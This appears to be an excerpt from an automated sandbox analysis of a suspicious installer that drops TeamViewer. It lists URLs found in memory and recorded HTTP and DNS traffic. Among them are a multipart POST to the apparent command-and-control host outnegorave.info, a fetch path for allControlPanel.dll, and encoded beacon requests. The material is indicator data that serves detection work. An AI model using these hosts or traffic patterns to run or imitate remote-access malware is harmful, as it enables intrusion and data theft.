Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001B
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001J
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIx
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001X
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001h
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001p
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001t
Source: TeamViewer.exe, 00000003.00000003.407522755.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001o
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sT
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000
Source: 77Etc0bR2v.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 77Etc0bR2v.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: TeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com/download
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com/help
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335540
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
